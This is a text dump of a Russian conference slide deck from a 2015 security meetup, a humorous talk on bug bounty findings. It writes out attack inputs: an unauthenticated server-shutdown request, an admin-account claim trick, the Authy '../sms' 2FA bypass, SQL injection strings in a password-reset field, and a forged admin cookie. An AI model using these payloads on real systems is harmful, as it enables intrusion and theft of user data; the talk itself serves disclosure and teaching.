Дмитрий Bo0oM Бумов, один из наиболее активных хакеров bug bounty программы Mail.Ru Group и участник других программ поиска уязвимостей, со свойственным ему неподражаемым остроумием рассказал о том, что искать баги – это не только сложно, но и весело. Кроме того, он подробно разобрал самые необычные из найденных им экземпляров.

1. learnppt.com
LOGO
Ты такой смешной!!!1!))00)
Весёлые (и не очень) баги и взломы
9 апреля 2015
#securitymeetup

2. ПРЕДУПРЕЖДЕНИЕ!
Последующие слайды содержат сцены
сексуального насилия над web-приложениями
и програмным обеспечением
различной тематики и направленности.
Копирование и воспроизведение векторов атак
карается 272 статьей Уголовного кодекса
Российской Федерации, хотя такие экземпляры
ещё и найти надо, так что можете попробовать,
но если что, я вас предупреждал! Ну вы поняли...

3. 3
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
Время интересных
ИСТОРИЙ
#securitymeetup

4. 4
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@isox_xx
#securitymeetup

5. 5
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
GET /shutdown/ HTTP/1.1
Host: up-fotki.yandex.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0)
Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fotki.yandex.ru/upload?force=js
Cервак выключается...
https://up-fotki.yandex.ru/shutdown/
@isox_xx
#securitymeetup

6. 6
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@isox_xx
#securitymeetup

7. 7
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@isox_xx
#securitymeetup

8. 8
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@isox_xx
#securitymeetup

9. 9
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@webpentest
POST /signup/claim/id*/ HTTP/1.1
...
CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&email=email@example.com&p
assword=test&login=MyLogin
POST /signup/claim/WMkiheTT-8kRslImVLWMVw/ HTTP/1.1
...
CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&email=email@example.com&p
assword=test&login=Administrator
Регистрация курильщика:
Регистрация здорового человека:
*Где id - уникальный идентификатор, который берётся... На странице существующего пользователя
#securitymeetup

10. 10
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@webpentest
Уже существует пользователь? Не беда!
В итоге перекидывает в админку сервиса с
"свежереганным" логином.
#securitymeetup

11. 11
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@4rt3m
#securitymeetup

12. 12
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@4rt3m
#securitymeetup

13. 13
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup

14. 14
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@fb1h2s @msecnet
#securitymeetup

15. 15
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@homakov
#securitymeetup

16. 16
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@homakov
1. Вводим ../sms в поле токена
2. Клиент кодирует это как ..%2fsms и делает запрос на
api.authy.com/protected/json/verify/..%2fsms/authy_id
3. path_traversal декодирует полученный URL на раннем этапе в
api.authy.com/protected/json/verify/../sms/authy_id, делит все по / и удаляет директорию
/verify
4. Теперь само приложение получает модифицированный путь
api.authy.com/protected/json/sms/authy_id который посылает СМС жертве и возвращает
200 статус и ответом {«success»:true,«message»:«SMS token was sent»,
«cellphone»:"+1-XXX-XXX-XX85"}
5. Наш клиент который хотел проверить наш токен видит 200 статус и делает вывод
что токен правильный. Даже если используется кастомная реализация API, клиент
скорее всего ищет success=true что в нашем ответе тоже присутствует.
Попросту говоря введя ../sms в поле токена можно было обойти двух факторную
аутенфикацию на всех сайтах использующих Authy.
#securitymeetup

17. 17
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup

18. 18
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup

19. 19
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@fgkm_
Когда имя пользователя в url
#securitymeetup

20. 20
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@Black2Fan
RCE В ФОРМИРОВАНИИ CSS ФАЙЛА!!!!!11!!!!!адин!!
#securitymeetup

21. 21
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
Root, пароль для
слабаков!
#securitymeetup

22. 22
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@d90andrew
Восстановление пароля.
Поле для email'а:
my@gmail.com' and 'a'='a# - письмо приходит
my@gmail.com' and 'a'='b# - не отправляется
my@gmail.com' union select 1,2,3,4,5,6#
#securitymeetup

23. 23
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@d90andrew
my@gmail.com' union select
1,2,3,concat_ws(0x3a,version(),database()),5,6#
#securitymeetup

24. 24
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@d90andrew
Пара часов и база пользователей в кармане!
Точнее в почте...
#securitymeetup

25. 25
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup

26. 26
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
ЧОЭТА?
#securitymeetup

27. 27
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
@asintsov
Привет, сервак, как жизнь? Как дети? Форкаешься еще?
Если ты ADMIN, то хэш твоего пароля XXXXXXX!
Ты уверен, что у твоего пароля такой хэш?
Ну ты скажешь! Конечно! У меня такой же хэш и получился!
Админ я или кто, по-твоему!
Ну раз Админ, то проходи!
Ну привет, клиентик. Ты сам-то чьих будешь?
Ну как же это? Админ я, Админ!
Соединение установлено. Текущий пользователь: ADMIN
Самая крутая СУБД в мире - OpenEdge
#securitymeetup

28. 28
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
ЧТОЧТО ЗАЗА
херняхерня туттут
ПРОИСХОДИТ??ПРОИСХОДИТ??
#securitymeetup

29. 29
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
Были подобраны файлы и папки:
• /image/
• /css/
• /js/
• /index.php
• /login.php
• /logout.php
#securitymeetup

30. 30
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
GET /logout.php HTTP/1.1
Host: *******.ru
HTTP/1.1 200 Ok
Server: nginx
Date: Dec, 29 Apr 1970 13:14:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Set-Cookie: 7ed93bc3576665339e899f356890fa5e=false; Path=/
Запрос:
Ответ:
#securitymeetup

31. 31
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
GET /index.php HTTP/1.1
Host: *******.ru
Cookie: 7ed93bc3576665339e899f356890fa5e=true
Запрос:
Добро пожаловать в панель
администратора!
ииииииииии...
#securitymeetup

32. 32
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
А бывает наоборот...
#securitymeetup

33. 33
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup
Bo0oM
@i_bo0om
Пишу лучше чем говорю
(инфа сотка)

34. 34
Questions & feedback? Email me – dave@learnppt.com
More PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup
СДАЛСДАЛ
ИГЭИГЭ
??http://goo.gl/TxxCi3